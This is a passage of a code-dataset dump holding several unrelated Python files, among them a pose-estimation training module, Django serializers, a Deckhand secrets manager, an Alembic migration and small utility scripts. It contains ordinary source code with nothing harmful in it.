np.math.pi\n * 180\n ).item(),\n on_step=True,\n on_epoch=True,\n )\n\n self.log(\n f\"inital_trans_error\",\n torch.norm(h_gt[0, :3, 3] - h_init[0, :3, 3]).item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"inital_rotation_error\",\n (\n so3_relative_angle(\n h_gt[:, :3, :3].type(torch.float32), h_init[:, :3, :3].type(torch.float32)\n )\n / np.math.pi\n * 180\n ).item(),\n on_step=True,\n on_epoch=True,\n )\n\n if len(res_dict) > 0:\n self.log(f\"ransac_inlier_ratio\", float(ratios[0]), on_step=False, on_epoch=True)\n # STORE PREDICTIONS\n tmp = os.path.join(\n self._exp[\"name\"], p[0][p[0].find(\"ycb\") :], str(int(idx[0]) + 1) + \".npy\"\n )\n tmp2 = os.path.join(\n \"/home/jonfrey/tmp\", p[0][p[0].find(\"ycb\") :], str(int(idx[0]) + 1) + \".npy\"\n )\n Path(tmp).parent.mkdir(parents=True, exist_ok=True)\n np.save(str(tmp), h_pred__pred_pred[0].cpu().numpy())\n Path(tmp2).parent.mkdir(parents=True, exist_ok=True)\n np.save(str(tmp2), h_pred__pred_pred[0].cpu().numpy())\n\n index_key = str(int(idx))\n self.log(f\"acc_mask_obj\" + index_key, acc.item(), on_step=True, on_epoch=True)\n\n self.log(\n f\"adds_init_obj\" + index_key,\n res_dict[\"adds_h_init\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"add_s_init_obj\" + index_key,\n res_dict[\"add_s_h_init\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n\n self.log(\n f\"adds_obj\" + index_key,\n res_dict[\"adds_h_pred\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.log(\n f\"add_s_obj\" + index_key,\n res_dict[\"add_s_h_pred\"].cpu().item(),\n on_step=True,\n on_epoch=True,\n )\n self.plot_pose(\n model_points=model_points,\n h_gt=h_gt,\n h_init=h_init,\n h_pred=h_pred__pred_pred,\n pred_valid=pred_valid,\n img_real_zoom=batch[0],\n img_real_ori=img_real_ori,\n K_real=K_real,\n index=batch_idx,\n )\n else:\n print(\"Count SUC\", self.count_suc, \" Count FAILED\", self.count_failed)\n # print(\"Force PLOT since Pose Estimation vailed!\")\n # self.plot( batch[2], flow_predictions, batch[0], batch[1], pred_valid, force =True, index = batch_idx)\n # self.plot_seg ( batch[0], batch[1], pred_valid, valid,force = True, index = batch_idx )\n\n if batch_idx % 50 == 0:\n self.log(f\"count_suc\", self.count_suc, on_step=True, on_epoch=False)\n self.log(f\"count_failed\", self.count_failed, on_step=True, on_epoch=False)\n\n for k in res_dict.keys():\n # print( \"k \", k, \" res_dict \", res_dict[k] ,\" value \", res_dict[k].mean())\n self.log(\n f\"{self._mode}_{k}_pred_flow_pred_seg\",\n res_dict[k].mean().item(),\n on_step=True,\n on_epoch=False,\n prog_bar=False,\n )\n\n if False:\n # GT FLOW GT SEG\n res_dict, count_invalid, h_pred__gt_gt = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=valid.clone(),\n flow_pred=flow.clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n for k in res_dict.keys():\n self.log(\n f\"{self._mode}_{k}_gt_flow_gt_seg\",\n res_dict[k].mean(),\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n # PRED FLOW GT SEG\n (\n h_gt,\n h_render,\n h_init,\n bb,\n idx,\n K_ren,\n K_real,\n render_d,\n model_points,\n img_real_ori,\n p,\n ) = batch[5:]\n res_dict, count_invalid, h_pred__pred_gt = full_pose_estimation(\n h_gt=h_gt.clone(),\n h_render=h_render.clone(),\n h_init=h_init.clone(),\n bb=bb,\n flow_valid=valid.clone(),\n 
flow_pred=flow_predictions[-1].clone(),\n idx=idx.clone(),\n K_ren=K_ren,\n K_real=K_real,\n render_d=render_d.clone(),\n model_points=model_points.clone(),\n cfg=self._exp[\"eval_cfg\"].get(\"full_pose_estimation\", {}),\n )\n for k in res_dict.keys():\n self.log(\n f\"{self._mode}_{k}_pred_flow_gt_seg\",\n res_dict[k].mean(),\n on_step=True,\n on_epoch=True,\n prog_bar=False,\n )\n\n else:\n idx = batch[5]\n bb = batch[6] # list containing tensors for [real_tl ,real_br, ren_tl, ren_br ]\n\n logging_metrices = [\"epe\", \"epe_real\", \"epe_render\"]\n for met in logging_metrices:\n if met in metrics:\n self.log(\n f\"{self._mode}_{met}\",\n metrics[met],\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n if self._exp.get(\"log\", {}).get(\"individual_obj\", {}).get(self._mode, False):\n for i in range(BS):\n obj = str(int(idx[i]))\n # real_tl ,real_br, ren_tl, ren_br\n tl = bb[0][i]\n br = bb[1][i]\n\n _w = br[1] - tl[1]\n _h = br[0] - tl[0]\n\n # r1 and r2 should be equal up to discretization errors\n r1 = 480 / _h\n r2 = 640 / _w\n r = (r1 + r2) / 2\n if synthetic[i]:\n self.log(\n f\"{self._mode}_render_norm_obj{obj}\",\n epe_per_object[i].float().item() / r,\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_render_obj{obj}\",\n epe_per_object[i].float().item(),\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n else:\n self.log(\n f\"{self._mode}_real_norm_obj{obj}\",\n epe_per_object[i].float().item() / r,\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_real_obj{obj}\",\n epe_per_object[i].float().item(),\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n\n self._count_real[self._mode] += (synthetic == False).sum()\n self._count_render[self._mode] += (synthetic).sum()\n\n self.log(\n f\"{self._mode}_count_real\",\n self._count_real[self._mode],\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n self.log(\n f\"{self._mode}_count_render\",\n self._count_render[self._mode],\n on_step=False,\n on_epoch=True,\n prog_bar=False,\n )\n\n return {\"loss\": loss, \"pred\": flow_predictions, \"target\": flow}\n\n def plot_pose(\n self,\n model_points,\n h_gt,\n h_init,\n h_pred,\n pred_valid,\n img_real_zoom,\n img_real_ori,\n K_real,\n index=0,\n ):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode]:\n b = 0\n img_gt = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_gt[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_gt\",\n epoch=index,\n not_log=True,\n store=False,\n )\n img_pred = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_pred[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_pred\",\n epoch=index,\n not_log=True,\n store=False,\n )\n img_init = self._visu.plot_estimated_pose(\n img=img_real_ori[b].cpu().numpy(),\n points=model_points[b].cpu(),\n H=h_init[b].cpu(),\n K=K_real[b].cpu(),\n tag=\"Test_init\",\n not_log=True,\n store=False,\n )\n\n ass = np.concatenate([img_init, img_pred, img_gt], axis=1)\n print(ass.shape)\n self._visu.plot_image(img=ass, tag=\"Pose_INIT_PRED_GT\", epoch=index, store=False)\n\n def plot(self, flow_gt, flow_pred, img1, img2, valid, force=False):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode] or force:\n\n for flow, name in zip([flow_gt, flow_pred[-1]], [\"gt\", \"pred\"]):\n corros = []\n for b in range(img1.shape[0]):\n\n i1 = img1[b].permute(1, 2, 0)\n i2 = img2[b].permute(1, 2, 0)\n va = 
valid[b]\n fl = flow[b].permute(1, 2, 0)\n corros.append(\n fn(\n self._visu.plot_corrospondence(\n fl[:, :, 0],\n fl[:, :, 1],\n va,\n i1,\n i2,\n colorful=True,\n text=False,\n res_h=30,\n res_w=30,\n min_points=50,\n jupyter=False,\n not_log=True,\n )\n )\n )\n\n res = torch.stack(corros).permute(0, 3, 1, 2)\n img = make_grid(res, nrow=2, padding=5)\n idx = self._logged_images[self._mode]\n\n nr = self._logged_images[self._mode] + self.trainer.current_epoch * (\n self._logged_images_max[self._mode] + 1\n )\n self._visu.plot_image(\n img=img, tag=f\"Flow_{self._mode}_{name}\", epoch=nr, store=False\n )\n self._logged_images[self._mode] += 1\n\n def plot_seg(\n self, ori_real, ori_render, pred, target, force=False, idx=None, index=0\n ):\n if self._logged_images[self._mode] < self._logged_images_max[self._mode] or force:\n BS = pred.shape[0]\n rows = int(BS ** 0.5)\n grid_target = make_grid(\n target[:, None].repeat(1, 3, 1, 1),\n nrow=rows,\n padding=2,\n scale_each=False,\n pad_value=2,\n )\n grid_pred = make_grid(\n pred[:, None].repeat(1, 3, 1, 1),\n nrow=rows,\n padding=2,\n scale_each=False,\n pad_value=2,\n )\n\n grid_ori_real = make_grid(\n ori_real, nrow=rows, padding=2, scale_each=False, pad_value=0\n )\n grid_ori_render = make_grid(\n ori_render, nrow=rows, padding=2, scale_each=False, pad_value=0\n )\n\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_pred[0, :, :],\n tag=\"PRED SEG\",\n method=\"left\",\n store=False,\n )\n self._visu.plot_image(\n img=grid_ori_render,\n tag=\"Segmentation_left_pred__right_render_img\",\n method=\"right\",\n epoch=index,\n store=False,\n )\n\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_pred[0, :, :],\n tag=\"PRED SEG\",\n method=\"left\",\n store=False,\n )\n self._visu.plot_detectron(\n img=grid_ori_real,\n label=grid_target[0, :, :],\n tag=\"Segmentation_left_pred__right_gt\",\n method=\"right\",\n epoch=index,\n store=False,\n )\n\n def training_step_end(self, outputs):\n # Log replay buffer stats\n self.log(\"train_loss\", outputs[\"loss\"], on_step=False, on_epoch=True, prog_bar=True)\n return {\"loss\": outputs[\"loss\"]}\n\n def validation_step(self, batch, batch_idx, dataloader_idx=0):\n return self.training_step(batch, batch_idx)\n\n def validation_step_end(self, outputs):\n self.log(\"val_loss\", outputs[\"loss\"], on_step=False, on_epoch=True, prog_bar=True)\n\n def on_validation_epoch_start(self):\n self._mode = \"val\"\n\n def validation_epoch_end(self, outputs):\n pass\n\n def configure_optimizers(self):\n if self._exp[\"optimizer\"][\"name\"] == \"ADAM\":\n optimizer = torch.optim.Adam(\n [{\"params\": self.model.parameters()}], lr=self.hparams[\"lr\"]\n )\n elif self._exp[\"optimizer\"][\"name\"] == \"SGD\":\n optimizer = torch.optim.SGD(\n [{\"params\": self.model.parameters()}],\n lr=self.hparams[\"lr\"],\n **self._exp[\"optimizer\"][\"sgd_cfg\"],\n )\n elif self._exp[\"optimizer\"][\"name\"] == \"WADAM\":\n optimizer = torch.optim.AdamW(\n self.model.parameters(),\n lr=self.hparams[\"lr\"],\n **self._exp[\"optimizer\"][\"wadam_cfg\"],\n )\n\n else:\n raise Exception(\"Optimizer name not defined\")\n\n if self._exp.get(\"lr_scheduler\", {}).get(\"active\", False):\n if self._exp[\"lr_scheduler\"][\"name\"] == \"POLY\":\n # polynomial lr-scheduler\n init_lr = self.hparams[\"lr\"]\n max_epochs = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"max_epochs\"]\n target_lr = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"target_lr\"]\n power = self._exp[\"lr_scheduler\"][\"poly_cfg\"][\"power\"]\n lambda_lr 
= (\n lambda epoch: (\n ((max_epochs - min(max_epochs, epoch)) / max_epochs) ** (power)\n )\n + (1 - (((max_epochs - min(max_epochs, epoch)) / max_epochs) ** (power)))\n * target_lr\n / init_lr\n )\n scheduler = torch.optim.lr_scheduler.LambdaLR(\n optimizer, lambda_lr, last_epoch=-1, verbose=True\n )\n elif self._exp[\"lr_scheduler\"][\"name\"] == \"OneCycleLR\":\n num_steps = self._exp[\"lr_scheduler\"][\"onecyclelr_cfg\"][\"num_steps\"]\n\n scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n max_lr=self.hparams[\"lr\"],\n total_steps=num_steps + 100,\n pct_start=self._exp[\"lr_scheduler\"][\"onecyclelr_cfg\"].get(\"pct_start\", 0.05),\n cycle_momentum=False,\n anneal_strategy=\"linear\",\n )\n\n lr_scheduler = {\"scheduler\": scheduler, \"interval\": \"step\"}\n\n ret = {\"optimizer\": optimizer, \"lr_scheduler\": lr_scheduler}\n else:\n ret = [optimizer]\n return ret\n","sub_path":"src/flow/lightning/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":20379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"216186160","text":"#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nCheck A0000001.txt.\r\n\"\"\"\r\n\r\nimport os\r\nimport sys\r\nimport re\r\nimport codecs\r\n\r\nimport CheckLog\r\nlog = CheckLog.get_file_log(r'checkA.log')\r\n\r\nclass DicItemA:\r\n\tdef __init__(self, s):\r\n\t\ts = s.strip()\r\n\t\tself._linestr = s\r\n\t\tpat = re.match( \\\r\n\t\t\t\tr'^(\\S+)\\t([\\w ]+)\\t(0x[\\dA-F]{4})\\t(0x[\\dA-F]{4})\\t(0x[\\dA-F]{8})$', \\\r\n\t\t\t\tself._linestr)\r\n\t\tif not pat:\r\n\t\t\tlog.warning(r' : %s : %s', self.get_father()['nextLevelId'], self.get_str())\r\n\t\t\treturn\r\n\t\tself._name = pat.group(1)\r\n\t\tself._pinyin = pat.group(2)\r\n\t\tself._minKiwiId = pat.group(3)\r\n\t\tself._maxKiwiId = pat.group(4)\r\n\t\tself._num0 = pat.group(5)\r\n\t\t\r\n\tdef get_str(self):\r\n\t\treturn self._linestr\r\n\t\r\n\tdef __getitem__(self, attr):\r\n\t\tif attr == 'name':\r\n\t\t\treturn self._name\r\n\t\telif attr == 'pinyin':\r\n\t\t\treturn self._pinyin\r\n\t\telif attr == 'minKiwiId':\r\n\t\t\treturn self._minKiwiId\r\n\t\telif attr == 'maxKiwiId':\r\n\t\t\treturn self._maxKiwiId\r\n\t\telif attr == 'num0':\r\n\t\t\treturn self._num0\r\n\t\telse:\r\n\t\t\traise KeyError()\r\n\t\t\r\n\tdef check(self):\r\n\t\t\"\"\" Check the item itself only.\r\n\t\t\"\"\"\r\n\t\tchecker = DicItemAChecker(self)\r\n\t\tr = checker.check()\r\n\t\tif not r:\r\n\t\t\tlog.warning(r' : %s', self.get_str())\r\n\t\treturn r\r\n\t\r\nclass DicItemAChecker():\r\n\tpinyinChars = set(u'abcdefghijklmnopqrstuvwxyz /1234')\r\n\t\r\n\tdef __init__(self, item):\r\n\t\tself._item = item\r\n\t\t\r\n\tdef check(self):\r\n\t\tr1 = self._check_1()\r\n\t\tr2 = self._check_2()\r\n\t\treturn r1 and r2\r\n\t\r\n\tdef _check_1(self):\r\n\t\t\"\"\"Check encoding, which is checked in function check().\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\t\r\n\tdef _check_2(self):\r\n\t\t\"\"\"Check pinyin.\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\tr1 = self._check_2_1()\r\n\t\tr2 = self._check_2_2();\r\n\t\tif not r1:\r\n\t\t\tlog.info(r' Alphabet text but not NoPinYin : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\tif not r2:\r\n\t\t\tlog.info(r' Pinyin contains other characters : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_1(self):\r\n\t\t\"\"\"Check if text has alphabet, then pinyin should be \"NoPinYin\".\r\n\t\t\"\"\"\r\n\t\tdef has_alphabet(s):\r\n\t\t\tfor c in 
s:\r\n\t\t\t\tif c in self.alphabets:\r\n\t\t\t\t\treturn True\r\n\t\t\treturn False\r\n\t\tif has_alphabet(self._dicItem['name']):\r\n\t\t\tif self._dicItem['pinyin'] != u'NoPinYin':\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_2(self):\r\n\t\t\"\"\"Check characters in pinyin.\r\n\t\t\"\"\"\r\n\t\tpinyin = self._dicItem['pinyin']\r\n\t\tif pinyin == 'NoPinYin':\r\n\t\t\treturn True\r\n\t\tfor c in pinyin:\r\n\t\t\tif not c in self.pinyinChars:\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\ndef check(filename):\r\n\t\"\"\"Check records in file.\r\n\t\"\"\"\r\n\tf = codecs.open(filename, 'r', 'gbk')\r\n\ttry:\r\n\t\tls = f.readlines()\r\n\texcept:\r\n\t\tlog.info(r' Contain non-GBK character : %s', self._dicItem.get_str())\r\n\t\treturn False\r\n\trds = tuple(DicItemA(line) for line in ls)\r\n\tr = tuple(r.check() for r in rds)\r\n\treturn all(r)\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint('Usage:')\r\n\t\tprint(r'python check.py [Filepath of A000000.txt]')\r\n\t\tsys.exit(0)\r\n\tfilename = sys.argv[1]\r\n\tcheck(filename)","sub_path":"pycode/checkA.py","file_name":"checkA.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"480418731","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom core.models import Student, Professor, Institute, FieldOfStudies, Course\n\n\nclass UserRegistrationSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user registration or creation\"\"\"\n tokens = serializers.SerializerMethodField()\n\n class Meta:\n \"\"\"Meta class for User registration serializer\"\"\"\n model = get_user_model()\n fields = ('email',\n 'password',\n 'id',\n 'name',\n 'is_professor',\n 'is_student',\n 'user_image',\n 'tokens',\n 'avatar_num')\n extra_kwargs = {'password': {'write_only': True, 'min_length': 6}}\n\n def get_tokens(self, user):\n \"\"\"Returns tokens for token authentication\"\"\"\n refresh = RefreshToken.for_user(user)\n return {\n 'refresh': str(refresh),\n 'access': str(refresh.access_token),\n }\n\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user update or creation\"\"\"\n class Meta:\n \"\"\"Meta class for User update serializer without email as unique field\"\"\"\n model = get_user_model()\n fields = ('email',\n 'password',\n 'id',\n 'name',\n 'is_professor',\n 'is_student',\n 'is_university_administrator',\n 'user_image',\n 'avatar_num')\n extra_kwargs = {'password': {'write_only': True, 'min_length': 6}}\n\n\nclass PhotoUploadSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user_image upload for User model\"\"\"\n\n class Meta:\n \"\"\"Meta class for PhotoUploadSerializer\"\"\"\n model = get_user_model()\n fields = ('user_image',)\n\n\nclass GeneralUserSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for getting basic User info\"\"\"\n\n class Meta:\n \"\"\"Meta class for GeneralUserSerializer\"\"\"\n model = get_user_model()\n \"\"\"Meta class for User\"\"\"\n fields = ('id', 'email', 'name')\n\n\nclass CreateUpdateStudentSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for creating or updating Student\"\"\"\n class Meta:\n \"\"\"Meta class for CreateUpdateStudentSerializer\"\"\"\n model = Student\n \"\"\"Meta class for CreateStudentSerializer\"\"\"\n fields = ('id', 'field_of_studies', 'institute', 'entry_semester', 
'approx_exit_semester')\n\n\nclass CreateUpdateProfessorSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for creating or updating Professor\"\"\"\n\n class Meta:\n \"\"\"Meta class for CreateUpdateProfessorSerializer\"\"\"\n model = Professor\n \"\"\"Meta class for CreateProfessorSerializer\"\"\"\n fields = ('id', 'field_of_studies', 'institute')\n\n\nclass InstituteSerializer(serializers.ModelSerializer):\n \"\"\"Institute model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class for Institute serializer\"\"\"\n model = Institute\n fields = ('name', 'id')\n\n\nclass FieldOfStudiesSerializer(serializers.ModelSerializer):\n \"\"\"FieldOfStudies model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class for FieldOfStudies serializer\"\"\"\n model = FieldOfStudies\n fields = ['name', 'id']\n\n\nclass CourseSerializer(serializers.ModelSerializer):\n \"\"\"Course model serializer\"\"\"\n field_of_studies = FieldOfStudiesSerializer(required=True)\n professor = CreateUpdateProfessorSerializer(required=True)\n\n class Meta:\n \"\"\"Meta class for Course serializer\"\"\"\n model = Course\n fields = ['name', 'field_of_studies', 'professor', 'id']\n\n\nclass StudentSerializerWithCourses(serializers.ModelSerializer):\n \"\"\"Serializer for getting Student with courses\"\"\"\n id = serializers.ReadOnlyField()\n user = UserRegistrationSerializer(required=True)\n institute = InstituteSerializer(required=True)\n field_of_studies = FieldOfStudiesSerializer(required=True)\n courses = CourseSerializer(source=\"course_set\", many=True)\n\n class Meta:\n \"\"\"Meta class for Student serializer with courses\"\"\"\n model = Student\n fields = ('id',\n 'field_of_studies',\n 'institute', 'user',\n 'entry_semester',\n 'approx_exit_semester',\n 'courses')\n\n\nclass ProfessorSerializerWithCourses(serializers.ModelSerializer):\n \"\"\"Serializer for getting Professor with courses\"\"\"\n id = serializers.ReadOnlyField()\n user = UserRegistrationSerializer(required=True)\n institute = InstituteSerializer(required=True)\n field_of_studies = FieldOfStudiesSerializer(required=True)\n taught_courses = CourseSerializer(source=\"course_set\", many=True)\n\n class Meta:\n \"\"\"Meta class for Professor serializer with courses\"\"\"\n model = Professor\n fields = ('id',\n 'field_of_studies',\n 'institute',\n 'user',\n 'taught_courses')\n","sub_path":"app/user_administration/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"205912401","text":"# Copyright 2017 AT&T Intellectual Property. 
All other rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom oslo_log import log as logging\n\nfrom deckhand.barbican import driver\nfrom deckhand.db.sqlalchemy import api as db_api\nfrom deckhand.engine import document as document_wrapper\nfrom deckhand import utils\n\nLOG = logging.getLogger(__name__)\n\nCLEARTEXT = 'cleartext'\nENCRYPTED = 'encrypted'\n\n\nclass SecretsManager(object):\n \"\"\"Internal API resource for interacting with Barbican.\n\n Currently only supports Barbican.\n \"\"\"\n\n barbican_driver = driver.BarbicanDriver()\n\n def create(self, secret_doc):\n \"\"\"Securely store secrets contained in ``secret_doc``.\n\n Ordinarily, Deckhand documents are stored directly in Deckhand's\n database. However, secret data (contained in the data section for the\n documents with the schemas enumerated below) must be stored using a\n secure storage service like Barbican.\n\n Documents with ``metadata.storagePolicy`` == \"clearText\" have their\n secrets stored directly in Deckhand.\n\n Documents with ``metadata.storagePolicy`` == \"encrypted\" are stored in\n Barbican directly. Deckhand in turn stores the reference returned\n by Barbican in Deckhand.\n\n :param secret_doc: A Deckhand document with one of the following\n schemas:\n\n * ``deckhand/Certificate/v1``\n * ``deckhand/CertificateKey/v1``\n * ``deckhand/Passphrase/v1``\n\n :returns: Dictionary representation of\n ``deckhand.db.sqlalchemy.models.DocumentSecret``.\n \"\"\"\n encryption_type = secret_doc['metadata']['storagePolicy']\n secret_type = self._get_secret_type(secret_doc['schema'])\n\n if encryption_type == ENCRYPTED:\n # Store secret_ref in database for `secret_doc`.\n kwargs = {\n 'name': secret_doc['metadata']['name'],\n 'secret_type': secret_type,\n 'payload': secret_doc['data']\n }\n resp = self.barbican_driver.create_secret(**kwargs)\n\n secret_ref = resp['secret_href']\n created_secret = {'secret': secret_ref}\n elif encryption_type == CLEARTEXT:\n created_secret = {'secret': secret_doc['data']}\n\n return created_secret\n\n def _get_secret_type(self, schema):\n \"\"\"Get the Barbican secret type based on the following mapping:\n\n ``deckhand/Certificate/v1`` => certificate\n ``deckhand/CertificateKey/v1`` => private\n ``deckhand/Passphrase/v1`` => passphrase\n\n :param schema: The document's schema.\n :returns: The value corresponding to the mapping above.\n \"\"\"\n _schema = schema.split('/')[1].lower().strip()\n if _schema == 'certificatekey':\n return 'private'\n return _schema\n\n\nclass SecretsSubstitution(object):\n \"\"\"Class for document substitution logic for YAML files.\"\"\"\n\n def __init__(self, documents):\n \"\"\"SecretSubstitution constructor.\n\n :param documents: List of YAML documents in dictionary format that are\n candidates for secret substitution. 
This class will automatically\n detect documents that require substitution; documents need not be\n filtered prior to being passed to the constructor.\n \"\"\"\n if not isinstance(documents, (list, tuple)):\n documents = [documents]\n substitute_docs = [document_wrapper.Document(d) for d in documents if\n 'substitutions' in d['metadata']]\n self.documents = substitute_docs\n\n def substitute_all(self):\n \"\"\"Substitute all documents that have a `metadata.substitutions` field.\n\n Concrete (non-abstract) documents can be used as a source of\n substitution into other documents. This substitution is\n layer-independent, a document in the region layer could insert data\n from a document in the site layer.\n\n :returns: List of fully substituted documents.\n \"\"\"\n LOG.debug('Substituting secrets for documents: %s', self.documents)\n substituted_docs = []\n\n for doc in self.documents:\n LOG.debug(\n 'Checking for substitutions in schema=%s, metadata.name=%s',\n doc.get_name(), doc.get_schema())\n for sub in doc.get_substitutions():\n src_schema = sub['src']['schema']\n src_name = sub['src']['name']\n src_path = sub['src']['path']\n if src_path == '.':\n src_path = '.secret'\n\n # TODO(fmontei): Use secrets_manager for this logic. Need to\n # check Barbican for the secret if it has been encrypted.\n src_doc = db_api.document_get(\n schema=src_schema, name=src_name, is_secret=True,\n **{'metadata.layeringDefinition.abstract': False})\n src_secret = utils.jsonpath_parse(src_doc['data'], src_path)\n\n dest_path = sub['dest']['path']\n dest_pattern = sub['dest'].get('pattern', None)\n\n LOG.debug('Substituting from schema=%s name=%s src_path=%s '\n 'into dest_path=%s, dest_pattern=%s', src_schema,\n src_name, src_path, dest_path, dest_pattern)\n substituted_data = utils.jsonpath_replace(\n doc['data'], src_secret, dest_path, dest_pattern)\n doc['data'].update(substituted_data)\n\n substituted_docs.append(doc.to_dict())\n return substituted_docs\n","sub_path":"deckhand/engine/secrets_manager.py","file_name":"secrets_manager.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"321115746","text":"\"\"\"Added tags\n\nRevision ID: f38564e35d62\nRevises: 7dd0f5e2bfb9\nCreate Date: 2021-03-07 18:57:26.297863\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import Session\nfrom app.models import XSS\nimport json\n\n\n# revision identifiers, used by Alembic.\nrevision = \"f38564e35d62\"\ndown_revision = \"7dd0f5e2bfb9\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table(\"XSS\", schema=None) as batch_op:\n batch_op.add_column(sa.Column(\"tags\", sa.Text(), server_default=\"[]\", nullable=False))\n\n conn = op.get_bind()\n session = Session(bind=conn)\n\n for xss in session.query(XSS).all():\n xss_data = json.loads(xss.data)\n for element_name, element_value in xss_data.items():\n if element_name in [\"local_storage\", \"session_storage\", \"cookies\"]:\n if isinstance(element_value, list):\n new_data = {}\n for single_element in element_value:\n new_data.update(single_element)\n xss_data[element_name] = new_data\n xss.data = json.dumps(xss_data)\n\n xss_headers = json.loads(xss.headers)\n new_headers = {}\n if isinstance(xss_headers, list):\n for header in xss_headers:\n new_headers.update(header)\n xss.headers = json.dumps(new_headers)\n\n session.commit()\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"XSS\", schema=None) as batch_op:\n batch_op.drop_column(\"tags\")\n\n # ### end Alembic commands ###\n","sub_path":"server/migrations/versions/f38564e35d62_added_tags.py","file_name":"f38564e35d62_added_tags.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"24238070","text":"#Starting in the top-left corner of a 2x2 grid, and only being able to move to the right and down, there are exactly 6 routes to the bottom-right corner.\n#How many such routes are there through a 20x20 grid?\nimport time\nfrom math import factorial as fact\n\n\ndef latt_paths(n=20):\n #Follows binomial(2*n, n)\n return fact(2*n) / (fact(n) ** 2)\n\ndef ans(times):\n l = []\n for k in xrange(times):\n start_t = time.time()\n z = latt_paths()\n end_t = time.time()\n time_taken = end_t - start_t\n l.append(time_taken)\n return sorted(l)\n","sub_path":"solved/und1sec/p15.py","file_name":"p15.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"305626399","text":"import re\r\nimport yaml\r\nimport enchant\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.metrics import edit_distance\r\n\r\n#Class for removing repetitive characters from a word:\r\nclass RepetitionCorrector:\r\n def __init__(self):\r\n self.repeat_regexp = re.compile(r'(\\w*)(\\w)\\2(\\w*)')\r\n self.repl = r'\\1\\2\\3'\r\n\r\n def replace(self, word):\r\n if wordnet.synsets(word):\r\n return word\r\n\r\n repl_word = self.repeat_regexp.sub(self.repl, word)\r\n\r\n if repl_word != word:\r\n return self.replace(repl_word)\r\n else:\r\n return repl_word\r\n\r\n#Class for correcting misspelled words:\r\nclass SpellingCorrector:\r\n def __init__(self, dict_name='en-US', max_dist=2):\r\n self.spell_dict = enchant.Dict(dict_name)\r\n self.max_dist = 